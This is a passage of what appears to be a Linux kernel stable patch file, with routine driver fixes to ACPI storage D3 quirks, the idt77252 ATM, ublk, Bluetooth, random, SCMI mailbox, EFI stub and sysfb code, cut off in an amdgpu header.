++++ b/drivers/acpi/x86/utils.c
+@@ -200,39 +200,28 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+  * a hardcoded allowlist for D3 support, which was used for these platforms.
+  *
+  * This allows quirking on Linux in a similar fashion.
++ *
++ * Cezanne systems shouldn't *normally* need this as the BIOS includes
++ * StorageD3Enable.  But for two reasons we have added it.
++ * 1) The BIOS on a number of Dell systems have ambiguity
++ *    between the same value used for _ADR on ACPI nodes GPP1.DEV0 and GPP1.NVME.
++ *    GPP1.NVME is needed to get StorageD3Enable node set properly.
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216440
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=216773
++ *    https://bugzilla.kernel.org/show_bug.cgi?id=217003
++ * 2) On at least one HP system StorageD3Enable is missing on the second NVME
++      disk in the system.
+  */
+ static const struct x86_cpu_id storage_d3_cpu_ids[] = {
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 96, NULL),	/* Renoir */
+ 	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 104, NULL),	/* Lucienne */
+-	{}
+-};
+-
+-static const struct dmi_system_id force_storage_d3_dmi[] = {
+-	{
+-		/*
+-		 * _ADR is ambiguous between GPP1.DEV0 and GPP1.NVME
+-		 * but .NVME is needed to get StorageD3Enable node
+-		 * https://bugzilla.kernel.org/show_bug.cgi?id=216440
+-		 */
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 14 7425 2-in-1"),
+-		}
+-	},
+-	{
+-		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc."),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Inspiron 16 5625"),
+-		}
+-	},
++	X86_MATCH_VENDOR_FAM_MODEL(AMD, 25, 80, NULL),	/* Cezanne */
+ 	{}
+ };
+ 
+ bool force_storage_d3(void)
+ {
+-	const struct dmi_system_id *dmi_id = dmi_first_match(force_storage_d3_dmi);
+-
+-	return dmi_id || x86_match_cpu(storage_d3_cpu_ids);
++	return x86_match_cpu(storage_d3_cpu_ids);
+ }
+ 
+ /*
+diff --git a/drivers/atm/idt77252.c b/drivers/atm/idt77252.c
+index eec0cc2144e02..e327a0229dc17 100644
+--- a/drivers/atm/idt77252.c
++++ b/drivers/atm/idt77252.c
+@@ -2909,6 +2909,7 @@ close_card_oam(struct idt77252_dev *card)
+ 
+ 				recycle_rx_pool_skb(card, &vc->rcv.rx_pool);
+ 			}
++			kfree(vc);
+ 		}
+ 	}
+ }
+@@ -2952,6 +2953,15 @@ open_card_ubr0(struct idt77252_dev *card)
+ 	return 0;
+ }
+ 
++static void
++close_card_ubr0(struct idt77252_dev *card)
++{
++	struct vc_map *vc = card->vcs[0];
++
++	free_scq(card, vc->scq);
++	kfree(vc);
++}
++
+ static int
+ idt77252_dev_open(struct idt77252_dev *card)
+ {
+@@ -3001,6 +3011,7 @@ static void idt77252_dev_close(struct atm_dev *dev)
+ 	struct idt77252_dev *card = dev->dev_data;
+ 	u32 conf;
+ 
++	close_card_ubr0(card);
+ 	close_card_oam(card);
+ 
+ 	conf = SAR_CFG_RXPTH |	/* enable receive path           */
+diff --git a/drivers/block/ublk_drv.c b/drivers/block/ublk_drv.c
+index 4aec9be0ab77e..22a790d512842 100644
+--- a/drivers/block/ublk_drv.c
++++ b/drivers/block/ublk_drv.c
+@@ -656,7 +656,8 @@ static void __ublk_fail_req(struct ublk_queue *ubq, struct ublk_io *io,
+ 	}
+ }
+ 
+-static void ubq_complete_io_cmd(struct ublk_io *io, int res)
++static void ubq_complete_io_cmd(struct ublk_io *io, int res,
++				unsigned issue_flags)
+ {
+ 	/* mark this cmd owned by ublksrv */
+ 	io->flags |= UBLK_IO_FLAG_OWNED_BY_SRV;
+@@ -668,7 +669,7 @@ static void ubq_complete_io_cmd(struct ublk_io *io, int res)
+ 	io->flags &= ~UBLK_IO_FLAG_ACTIVE;
+ 
+ 	/* tell ublksrv one io request is coming */
+-	io_uring_cmd_done(io->cmd, res, 0);
++	io_uring_cmd_done(io->cmd, res, 0, issue_flags);
+ }
+ 
+ #define UBLK_REQUEUE_DELAY_MS	3
+@@ -685,7 +686,8 @@ static inline void __ublk_abort_rq(struct ublk_queue *ubq,
+ 	mod_delayed_work(system_wq, &ubq->dev->monitor_work, 0);
+ }
+ 
+-static inline void __ublk_rq_task_work(struct request *req)
++static inline void __ublk_rq_task_work(struct request *req,
++				       unsigned issue_flags)
+ {
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
+ 	int tag = req->tag;
+@@ -723,7 +725,7 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			pr_devel("%s: need get data. op %d, qid %d tag %d io_flags %x\n",
+ 					__func__, io->cmd->cmd_op, ubq->q_id,
+ 					req->tag, io->flags);
+-			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA);
++			ubq_complete_io_cmd(io, UBLK_IO_RES_NEED_GET_DATA, issue_flags);
+ 			return;
+ 		}
+ 		/*
+@@ -761,17 +763,18 @@ static inline void __ublk_rq_task_work(struct request *req)
+ 			mapped_bytes >> 9;
+ 	}
+ 
+-	ubq_complete_io_cmd(io, UBLK_IO_RES_OK);
++	ubq_complete_io_cmd(io, UBLK_IO_RES_OK, issue_flags);
+ }
+ 
+-static inline void ublk_forward_io_cmds(struct ublk_queue *ubq)
++static inline void ublk_forward_io_cmds(struct ublk_queue *ubq,
++					unsigned issue_flags)
+ {
+ 	struct llist_node *io_cmds = llist_del_all(&ubq->io_cmds);
+ 	struct ublk_rq_data *data, *tmp;
+ 
+ 	io_cmds = llist_reverse_order(io_cmds);
+ 	llist_for_each_entry_safe(data, tmp, io_cmds, node)
+-		__ublk_rq_task_work(blk_mq_rq_from_pdu(data));
++		__ublk_rq_task_work(blk_mq_rq_from_pdu(data), issue_flags);
+ }
+ 
+ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+@@ -783,12 +786,12 @@ static inline void ublk_abort_io_cmds(struct ublk_queue *ubq)
+ 		__ublk_abort_rq(ubq, blk_mq_rq_from_pdu(data));
+ }
+ 
+-static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd)
++static void ublk_rq_task_work_cb(struct io_uring_cmd *cmd, unsigned issue_flags)
+ {
+ 	struct ublk_uring_cmd_pdu *pdu = ublk_get_uring_cmd_pdu(cmd);
+ 	struct ublk_queue *ubq = pdu->ubq;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_rq_task_work_fn(struct callback_head *work)
+@@ -797,8 +800,9 @@ static void ublk_rq_task_work_fn(struct callback_head *work)
+ 			struct ublk_rq_data, work);
+ 	struct request *req = blk_mq_rq_from_pdu(data);
+ 	struct ublk_queue *ubq = req->mq_hctx->driver_data;
++	unsigned issue_flags = IO_URING_F_UNLOCKED;
+ 
+-	ublk_forward_io_cmds(ubq);
++	ublk_forward_io_cmds(ubq, issue_flags);
+ }
+ 
+ static void ublk_queue_cmd(struct ublk_queue *ubq, struct request *rq)
+@@ -1052,7 +1056,8 @@ static void ublk_cancel_queue(struct ublk_queue *ubq)
+ 		struct ublk_io *io = &ubq->ios[i];
+ 
+ 		if (io->flags & UBLK_IO_FLAG_ACTIVE)
+-			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0);
++			io_uring_cmd_done(io->cmd, UBLK_IO_RES_ABORT, 0,
++						IO_URING_F_UNLOCKED);
+ 	}
+ 
+ 	/* all io commands are canceled */
+@@ -1295,7 +1300,7 @@ static int ublk_ch_uring_cmd(struct io_uring_cmd *cmd, unsigned int issue_flags)
+ 	return -EIOCBQUEUED;
+ 
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: complete: cmd op %d, tag %d ret %x io_flags %x\n",
+ 			__func__, cmd_op, tag, ret, io->flags);
+ 	return -EIOCBQUEUED;
+@@ -2053,7 +2058,7 @@ static int ublk_ctrl_uring_cmd(struct io_uring_cmd *cmd,
+ 		break;
+ 	}
+  out:
+-	io_uring_cmd_done(cmd, ret, 0);
++	io_uring_cmd_done(cmd, ret, 0, issue_flags);
+ 	pr_devel("%s: cmd done ret %d cmd_op %x, dev id %d qid %d\n",
+ 			__func__, ret, cmd->cmd_op, header->dev_id, header->queue_id);
+ 	return -EIOCBQUEUED;
+diff --git a/drivers/bluetooth/btqcomsmd.c b/drivers/bluetooth/btqcomsmd.c
+index 2acb719e596f5..11c7e04bf3947 100644
+--- a/drivers/bluetooth/btqcomsmd.c
++++ b/drivers/bluetooth/btqcomsmd.c
+@@ -122,6 +122,21 @@ static int btqcomsmd_setup(struct hci_dev *hdev)
+ 	return 0;
+ }
+ 
++static int btqcomsmd_set_bdaddr(struct hci_dev *hdev, const bdaddr_t *bdaddr)
++{
++	int ret;
++
++	ret = qca_set_bdaddr_rome(hdev, bdaddr);
++	if (ret)
++		return ret;
++
++	/* The firmware stops responding for a while after setting the bdaddr,
++	 * causing timeouts for subsequent commands. Sleep a bit to avoid this.
++	 */
++	usleep_range(1000, 10000);
++	return 0;
++}
++
+ static int btqcomsmd_probe(struct platform_device *pdev)
+ {
+ 	struct btqcomsmd *btq;
+@@ -162,7 +177,7 @@ static int btqcomsmd_probe(struct platform_device *pdev)
+ 	hdev->close = btqcomsmd_close;
+ 	hdev->send = btqcomsmd_send;
+ 	hdev->setup = btqcomsmd_setup;
+-	hdev->set_bdaddr = qca_set_bdaddr_rome;
++	hdev->set_bdaddr = btqcomsmd_set_bdaddr;
+ 
+ 	ret = hci_register_dev(hdev);
+ 	if (ret < 0)
+diff --git a/drivers/bluetooth/btsdio.c b/drivers/bluetooth/btsdio.c
+index 795be33f2892d..02893600db390 100644
+--- a/drivers/bluetooth/btsdio.c
++++ b/drivers/bluetooth/btsdio.c
+@@ -354,6 +354,7 @@ static void btsdio_remove(struct sdio_func *func)
+ 
+ 	BT_DBG("func %p", func);
+ 
++	cancel_work_sync(&data->work);
+ 	if (!data)
+ 		return;
+ 
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 18bc947187115..5c536151ef836 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -1050,21 +1050,11 @@ static int btusb_recv_bulk(struct btusb_data *data, void *buffer, int count)
+ 		hci_skb_expect(skb) -= len;
+ 
+ 		if (skb->len == HCI_ACL_HDR_SIZE) {
+-			__u16 handle = __le16_to_cpu(hci_acl_hdr(skb)->handle);
+ 			__le16 dlen = hci_acl_hdr(skb)->dlen;
+-			__u8 type;
+ 
+ 			/* Complete ACL header */
+ 			hci_skb_expect(skb) = __le16_to_cpu(dlen);
+ 
+-			/* Detect if ISO packet has been sent over bulk */
+-			if (hci_conn_num(data->hdev, ISO_LINK)) {
+-				type = hci_conn_lookup_type(data->hdev,
+-							    hci_handle(handle));
+-				if (type == ISO_LINK)
+-					hci_skb_pkt_type(skb) = HCI_ISODATA_PKT;
+-			}
+-
+ 			if (skb_tailroom(skb) < hci_skb_expect(skb)) {
+ 				kfree_skb(skb);
+ 				skb = NULL;
+diff --git a/drivers/bus/imx-weim.c b/drivers/bus/imx-weim.c
+index 828c66bbaa676..55d917bd1f3f8 100644
+--- a/drivers/bus/imx-weim.c
++++ b/drivers/bus/imx-weim.c
+@@ -204,8 +204,8 @@ static int weim_parse_dt(struct platform_device *pdev)
+ 	const struct of_device_id *of_id = of_match_device(weim_id_table,
+ 							   &pdev->dev);
+ 	const struct imx_weim_devtype *devtype = of_id->data;
++	int ret = 0, have_child = 0;
+ 	struct device_node *child;
+-	int ret, have_child = 0;
+ 	struct weim_priv *priv;
+ 	void __iomem *base;
+ 	u32 reg;
+diff --git a/drivers/char/random.c b/drivers/char/random.c
+index ce3ccd172cc86..253f2ddb89130 100644
+--- a/drivers/char/random.c
++++ b/drivers/char/random.c
+@@ -1311,7 +1311,7 @@ static void __cold try_to_generate_entropy(void)
+ 			/* Basic CPU round-robin, which avoids the current CPU. */
+ 			do {
+ 				cpu = cpumask_next(cpu, &timer_cpus);
+-				if (cpu == nr_cpumask_bits)
++				if (cpu >= nr_cpu_ids)
+ 					cpu = cpumask_first(&timer_cpus);
+ 			} while (cpu == smp_processor_id() && num_cpus > 1);
+ 
+diff --git a/drivers/firmware/arm_scmi/mailbox.c b/drivers/firmware/arm_scmi/mailbox.c
+index 1e40cb035044d..a455f3c0e98b2 100644
+--- a/drivers/firmware/arm_scmi/mailbox.c
++++ b/drivers/firmware/arm_scmi/mailbox.c
+@@ -52,6 +52,39 @@ static bool mailbox_chan_available(struct device *dev, int idx)
+ 					   "#mbox-cells", idx, NULL);
+ }
+ 
++static int mailbox_chan_validate(struct device *cdev)
++{
++	int num_mb, num_sh, ret = 0;
++	struct device_node *np = cdev->of_node;
++
++	num_mb = of_count_phandle_with_args(np, "mboxes", "#mbox-cells");
++	num_sh = of_count_phandle_with_args(np, "shmem", NULL);
++	/* Bail out if mboxes and shmem descriptors are inconsistent */
++	if (num_mb <= 0 || num_sh > 2 || num_mb != num_sh) {
++		dev_warn(cdev, "Invalid channel descriptor for '%s'\n",
++			 of_node_full_name(np));
++		return -EINVAL;
++	}
++
++	if (num_sh > 1) {
++		struct device_node *np_tx, *np_rx;
++
++		np_tx = of_parse_phandle(np, "shmem", 0);
++		np_rx = of_parse_phandle(np, "shmem", 1);
++		/* SCMI Tx and Rx shared mem areas have to be distinct */
++		if (!np_tx || !np_rx || np_tx == np_rx) {
++			dev_warn(cdev, "Invalid shmem descriptor for '%s'\n",
++				 of_node_full_name(np));
++			ret = -EINVAL;
++		}
++
++		of_node_put(np_tx);
++		of_node_put(np_rx);
++	}
++
++	return ret;
++}
++
+ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 			      bool tx)
+ {
+@@ -64,6 +97,10 @@ static int mailbox_chan_setup(struct scmi_chan_info *cinfo, struct device *dev,
+ 	resource_size_t size;
+ 	struct resource res;
+ 
++	ret = mailbox_chan_validate(cdev);
++	if (ret)
++		return ret;
++
+ 	smbox = devm_kzalloc(dev, sizeof(*smbox), GFP_KERNEL);
+ 	if (!smbox)
+ 		return -ENOMEM;
+diff --git a/drivers/firmware/efi/earlycon.c b/drivers/firmware/efi/earlycon.c
+index 4d6c5327471ac..1bc6328646944 100644
+--- a/drivers/firmware/efi/earlycon.c
++++ b/drivers/firmware/efi/earlycon.c
+@@ -204,6 +204,14 @@ efi_earlycon_write(struct console *con, const char *str, unsigned int num)
+ 	}
+ }
+ 
++static bool __initdata fb_probed;
++
++void __init efi_earlycon_reprobe(void)
++{
++	if (fb_probed)
++		setup_earlycon("efifb");
++}
++
+ static int __init efi_earlycon_setup(struct earlycon_device *device,
+ 				     const char *opt)
+ {
+@@ -211,15 +219,17 @@ static int __init efi_earlycon_setup(struct earlycon_device *device,
+ 	u16 xres, yres;
+ 	u32 i;
+ 
+-	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI)
++	fb_wb = opt && !strcmp(opt, "ram");
++
++	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI) {
++		fb_probed = true;
+ 		return -ENODEV;
++	}
+ 
+ 	fb_base = screen_info.lfb_base;
+ 	if (screen_info.capabilities & VIDEO_CAPABILITY_64BIT_BASE)
+ 		fb_base |= (u64)screen_info.ext_lfb_base << 32;
+ 
+-	fb_wb = opt && !strcmp(opt, "ram");
+-
+ 	si = &screen_info;
+ 	xres = si->lfb_width;
+ 	yres = si->lfb_height;
+diff --git a/drivers/firmware/efi/efi-init.c b/drivers/firmware/efi/efi-init.c
+index 1639159493e3e..5cb7fb4549f0c 100644
+--- a/drivers/firmware/efi/efi-init.c
++++ b/drivers/firmware/efi/efi-init.c
+@@ -72,6 +72,9 @@ static void __init init_screen_info(void)
+ 		if (memblock_is_map_memory(screen_info.lfb_base))
+ 			memblock_mark_nomap(screen_info.lfb_base,
+ 					    screen_info.lfb_size);
++
++		if (IS_ENABLED(CONFIG_EFI_EARLYCON))
++			efi_earlycon_reprobe();
+ 	}
+ }
+ 
+diff --git a/drivers/firmware/efi/libstub/arm64-stub.c b/drivers/firmware/efi/libstub/arm64-stub.c
+index 7327b98d8e3fe..7c502dafe6f91 100644
+--- a/drivers/firmware/efi/libstub/arm64-stub.c
++++ b/drivers/firmware/efi/libstub/arm64-stub.c
+@@ -85,8 +85,10 @@ efi_status_t handle_kernel_image(unsigned long *image_addr,
+ 		}
+ 	}
+ 
+-	if (image->image_base != _text)
++	if (image->image_base != _text) {
+ 		efi_err("FIRMWARE BUG: efi_loaded_image_t::image_base has bogus value\n");
++		image->image_base = _text;
++	}
+ 
+ 	if (!IS_ALIGNED((u64)_text, SEGMENT_ALIGN))
+ 		efi_err("FIRMWARE BUG: kernel image not aligned on %dk boundary\n",
+diff --git a/drivers/firmware/efi/libstub/arm64.c b/drivers/firmware/efi/libstub/arm64.c
+index 4501652e11ab6..84d94443c601d 100644
+--- a/drivers/firmware/efi/libstub/arm64.c
++++ b/drivers/firmware/efi/libstub/arm64.c
+@@ -16,20 +16,43 @@
+ 
+ static bool system_needs_vamap(void)
+ {
+-	const u8 *type1_family = efi_get_smbios_string(1, family);
++	const struct efi_smbios_type4_record *record;
++	const u32 __aligned(1) *socid;
++	const u8 *version;
+ 
+ 	/*
+ 	 * Ampere eMAG, Altra, and Altra Max machines crash in SetTime() if
+-	 * SetVirtualAddressMap() has not been called prior.
++	 * SetVirtualAddressMap() has not been called prior. Most Altra systems
++	 * can be identified by the SMCCC soc ID, which is conveniently exposed
++	 * via the type 4 SMBIOS records. Otherwise, test the processor version
++	 * field. eMAG systems all appear to have the processor version field
++	 * set to "eMAG".
+ 	 */
+-	if (!type1_family || (
+-	    strcmp(type1_family, "eMAG") &&
+-	    strcmp(type1_family, "Altra") &&
+-	    strcmp(type1_family, "Altra Max")))
++	record = (struct efi_smbios_type4_record *)efi_get_smbios_record(4);
++	if (!record)
+ 		return false;
+ 
+-	efi_warn("Working around broken SetVirtualAddressMap()\n");
+-	return true;
++	socid = (u32 *)record->processor_id;
++	switch (*socid & 0xffff000f) {
++		static char const altra[] = "Ampere(TM) Altra(TM) Processor";
++		static char const emag[] = "eMAG";
++
++	default:
++		version = efi_get_smbios_string(&record->header, 4,
++						processor_version);
++		if (!version || (strncmp(version, altra, sizeof(altra) - 1) &&
++				 strncmp(version, emag, sizeof(emag) - 1)))
++			break;
++
++		fallthrough;
++
++	case 0x0a160001:	// Altra
++	case 0x0a160002:	// Altra Max
++		efi_warn("Working around broken SetVirtualAddressMap()\n");
++		return true;
++	}
++
++	return false;
+ }
+ 
+ efi_status_t check_platform_features(void)
+diff --git a/drivers/firmware/efi/libstub/efi-stub-entry.c b/drivers/firmware/efi/libstub/efi-stub-entry.c
+index 5245c4f031c0a..cc4dcaea67fa6 100644
+--- a/drivers/firmware/efi/libstub/efi-stub-entry.c
++++ b/drivers/firmware/efi/libstub/efi-stub-entry.c
+@@ -5,6 +5,15 @@
+ 
+ #include "efistub.h"
+ 
++static unsigned long screen_info_offset;
++
++struct screen_info *alloc_screen_info(void)
++{
++	if (IS_ENABLED(CONFIG_ARM))
++		return __alloc_screen_info();
++	return (void *)&screen_info + screen_info_offset;
++}
++
+ /*
+  * EFI entry point for the generic EFI stub used by ARM, arm64, RISC-V and
+  * LoongArch. This is the entrypoint that is described in the PE/COFF header
+@@ -56,6 +65,8 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 		return status;
+ 	}
+ 
++	screen_info_offset = image_addr - (unsigned long)image->image_base;
++
+ 	status = efi_stub_common(handle, image, image_addr, cmdline_ptr);
+ 
+ 	efi_free(image_size, image_addr);
+diff --git a/drivers/firmware/efi/libstub/efi-stub.c b/drivers/firmware/efi/libstub/efi-stub.c
+index 2955c1ac6a36e..f9c1e8a2bd1d3 100644
+--- a/drivers/firmware/efi/libstub/efi-stub.c
++++ b/drivers/firmware/efi/libstub/efi-stub.c
+@@ -47,11 +47,6 @@
+ static u64 virtmap_base = EFI_RT_VIRTUAL_BASE;
+ static bool flat_va_mapping = (EFI_RT_VIRTUAL_OFFSET != 0);
+ 
+-struct screen_info * __weak alloc_screen_info(void)
+-{
+-	return &screen_info;
+-}
+-
+ void __weak free_screen_info(struct screen_info *si)
+ {
+ }
+diff --git a/drivers/firmware/efi/libstub/efistub.h b/drivers/firmware/efi/libstub/efistub.h
+index 5b8f2c411ed82..1926644b43dea 100644
+--- a/drivers/firmware/efi/libstub/efistub.h
++++ b/drivers/firmware/efi/libstub/efistub.h
+@@ -1042,6 +1042,7 @@ efi_enable_reset_attack_mitigation(void) { }
+ void efi_retrieve_tpm2_eventlog(void);
+ 
+ struct screen_info *alloc_screen_info(void);
++struct screen_info *__alloc_screen_info(void);
+ void free_screen_info(struct screen_info *si);
+ 
+ void efi_cache_sync_image(unsigned long image_base,
+@@ -1054,6 +1055,8 @@ struct efi_smbios_record {
+ 	u16	handle;
+ };
+ 
++const struct efi_smbios_record *efi_get_smbios_record(u8 type);
++
+ struct efi_smbios_type1_record {
+ 	struct efi_smbios_record	header;
+ 
+@@ -1067,13 +1070,46 @@ struct efi_smbios_type1_record {
+ 	u8				family;
+ };
+ 
+-#define efi_get_smbios_string(__type, __name) ({			\
++struct efi_smbios_type4_record {
++	struct efi_smbios_record	header;
++
++	u8				socket;
++	u8				processor_type;
++	u8				processor_family;
++	u8				processor_manufacturer;
++	u8				processor_id[8];
++	u8				processor_version;
++	u8				voltage;
++	u16				external_clock;
++	u16				max_speed;
++	u16				current_speed;
++	u8				status;
++	u8				processor_upgrade;
++	u16				l1_cache_handle;
++	u16				l2_cache_handle;
++	u16				l3_cache_handle;
++	u8				serial_number;
++	u8				asset_tag;
++	u8				part_number;
++	u8				core_count;
++	u8				enabled_core_count;
++	u8				thread_count;
++	u16				processor_characteristics;
++	u16				processor_family2;
++	u16				core_count2;
++	u16				enabled_core_count2;
++	u16				thread_count2;
++	u16				thread_enabled;
++};
++
++#define efi_get_smbios_string(__record, __type, __name) ({		\
+ 	int size = sizeof(struct efi_smbios_type ## __type ## _record);	\
+ 	int off = offsetof(struct efi_smbios_type ## __type ## _record,	\
+ 			   __name);					\
+-	__efi_get_smbios_string(__type, off, size);			\
++	__efi_get_smbios_string((__record), __type, off, size);		\
+ })
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize);
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize);
+ 
+ #endif
+diff --git a/drivers/firmware/efi/libstub/screen_info.c b/drivers/firmware/efi/libstub/screen_info.c
+index 8e76a8b384ba1..4be1c4d1f922b 100644
+--- a/drivers/firmware/efi/libstub/screen_info.c
++++ b/drivers/firmware/efi/libstub/screen_info.c
+@@ -15,18 +15,11 @@
+  * early, but it only works if the EFI stub is part of the core kernel image
+  * itself. The zboot decompressor can only use the configuration table
+  * approach.
+- *
+- * In order to support both methods from the same build of the EFI stub
+- * library, provide this dummy global definition of struct screen_info. If it
+- * is required to satisfy a link dependency, it means we need to override the
+- * __weak alloc and free methods with the ones below, and those will be pulled
+- * in as well.
+  */
+-struct screen_info screen_info;
+ 
+ static efi_guid_t screen_info_guid = LINUX_EFI_SCREEN_INFO_TABLE_GUID;
+ 
+-struct screen_info *alloc_screen_info(void)
++struct screen_info *__alloc_screen_info(void)
+ {
+ 	struct screen_info *si;
+ 	efi_status_t status;
+diff --git a/drivers/firmware/efi/libstub/smbios.c b/drivers/firmware/efi/libstub/smbios.c
+index 460418b7f5f5e..f9c159c28f461 100644
+--- a/drivers/firmware/efi/libstub/smbios.c
++++ b/drivers/firmware/efi/libstub/smbios.c
+@@ -22,21 +22,30 @@ struct efi_smbios_protocol {
+ 	u8 minor_version;
+ };
+ 
+-const u8 *__efi_get_smbios_string(u8 type, int offset, int recsize)
++const struct efi_smbios_record *efi_get_smbios_record(u8 type)
+ {
+ 	struct efi_smbios_record *record;
+ 	efi_smbios_protocol_t *smbios;
+ 	efi_status_t status;
+ 	u16 handle = 0xfffe;
+-	const u8 *strtable;
+ 
+ 	status = efi_bs_call(locate_protocol, &EFI_SMBIOS_PROTOCOL_GUID, NULL,
+ 			     (void **)&smbios) ?:
+ 		 efi_call_proto(smbios, get_next, &handle, &type, &record, NULL);
+ 	if (status != EFI_SUCCESS)
+ 		return NULL;
++	return record;
++}
++
++const u8 *__efi_get_smbios_string(const struct efi_smbios_record *record,
++				  u8 type, int offset, int recsize)
++{
++	const u8 *strtable;
++
++	if (!record)
++		return NULL;
+ 
+-	strtable = (u8 *)record + recsize;
++	strtable = (u8 *)record + record->length;
+ 	for (int i = 1; i < ((u8 *)record)[offset]; i++) {
+ 		int len = strlen(strtable);
+ 
+diff --git a/drivers/firmware/efi/libstub/zboot-header.S b/drivers/firmware/efi/libstub/zboot-header.S
+index ec4525d40e0cf..445cb646eaaaf 100644
+--- a/drivers/firmware/efi/libstub/zboot-header.S
++++ b/drivers/firmware/efi/libstub/zboot-header.S
+@@ -63,7 +63,7 @@ __efistub_efi_zboot_header:
+ 	.long		.Lefi_header_end - .Ldoshdr
+ 	.long		0
+ 	.short		IMAGE_SUBSYSTEM_EFI_APPLICATION
+-	.short		0
++	.short		IMAGE_DLL_CHARACTERISTICS_NX_COMPAT
+ #ifdef CONFIG_64BIT
+ 	.quad		0, 0, 0, 0
+ #else
+diff --git a/drivers/firmware/efi/libstub/zboot.c b/drivers/firmware/efi/libstub/zboot.c
+index 66be5fdc6b588..22c2cf38ccc20 100644
+--- a/drivers/firmware/efi/libstub/zboot.c
++++ b/drivers/firmware/efi/libstub/zboot.c
+@@ -57,6 +57,11 @@ void __weak efi_cache_sync_image(unsigned long image_base,
+ 	// executable code loaded into memory to be safe for execution.
+ }
+ 
++struct screen_info *alloc_screen_info(void)
++{
++	return __alloc_screen_info();
++}
++
+ asmlinkage efi_status_t __efiapi
+ efi_zboot_entry(efi_handle_t handle, efi_system_table_t *systab)
+ {
+diff --git a/drivers/firmware/efi/sysfb_efi.c b/drivers/firmware/efi/sysfb_efi.c
+index f06fdacc9bc83..e76d6803bdd08 100644
+--- a/drivers/firmware/efi/sysfb_efi.c
++++ b/drivers/firmware/efi/sysfb_efi.c
+@@ -341,7 +341,7 @@ static const struct fwnode_operations efifb_fwnode_ops = {
+ #ifdef CONFIG_EFI
+ static struct fwnode_handle efifb_fwnode;
+ 
+-__init void sysfb_apply_efi_quirks(struct platform_device *pd)
++__init void sysfb_apply_efi_quirks(void)
+ {
+ 	if (screen_info.orig_video_isVGA != VIDEO_TYPE_EFI ||
+ 	    !(screen_info.capabilities & VIDEO_CAPABILITY_SKIP_QUIRKS))
+@@ -355,7 +355,10 @@ __init void sysfb_apply_efi_quirks(struct platform_device *pd)
+ 		screen_info.lfb_height = temp;
+ 		screen_info.lfb_linelength = 4 * screen_info.lfb_width;
+ 	}
++}
+ 
++__init void sysfb_set_efifb_fwnode(struct platform_device *pd)
++{
+ 	if (screen_info.orig_video_isVGA == VIDEO_TYPE_EFI && IS_ENABLED(CONFIG_PCI)) {
+ 		fwnode_init(&efifb_fwnode, &efifb_fwnode_ops);
+ 		pd->dev.fwnode = &efifb_fwnode;
+diff --git a/drivers/firmware/sysfb.c b/drivers/firmware/sysfb.c
+index 3fd3563d962b8..3c197db42c9d9 100644
+--- a/drivers/firmware/sysfb.c
++++ b/drivers/firmware/sysfb.c
+@@ -81,6 +81,8 @@ static __init int sysfb_init(void)
+ 	if (disabled)
+ 		goto unlock_mutex;
+ 
++	sysfb_apply_efi_quirks();
++
+ 	/* try to create a simple-framebuffer device */
+ 	compatible = sysfb_parse_mode(si, &mode);
+ 	if (compatible) {
+@@ -107,7 +109,7 @@ static __init int sysfb_init(void)
+ 		goto unlock_mutex;
+ 	}
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_data(pd, si, sizeof(*si));
+ 	if (ret)
+diff --git a/drivers/firmware/sysfb_simplefb.c b/drivers/firmware/sysfb_simplefb.c
+index a353e27f83f54..ca907f7e76c65 100644
+--- a/drivers/firmware/sysfb_simplefb.c
++++ b/drivers/firmware/sysfb_simplefb.c
+@@ -110,7 +110,7 @@ __init struct platform_device *sysfb_create_simplefb(const struct screen_info *s
+ 	if (!pd)
+ 		return ERR_PTR(-ENOMEM);
+ 
+-	sysfb_apply_efi_quirks(pd);
++	sysfb_set_efifb_fwnode(pd);
+ 
+ 	ret = platform_device_add_resources(pd, &res, 1);
+ 	if (ret)
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index d148a1bd85e67..c26e350583bf6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -1268,6 +1268,7 @@ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
++bool amdgpu_device_aspm_support_quirk(void);
+ 
+ void amdgpu_cs_report_moved_bytes(struct amdgpu_device *adev, u64 num_bytes,
+ 				  u64 num_vis_bytes);
+@@ -1387,10 +1388,12 @@ int amdgpu_acpi_smart_shift_update(struct drm_device *dev, enum amdgpu_ss ss_sta
+ int amdgpu_acpi_pcie_notify_device_ready(struct amdgpu_device *adev);
+ 
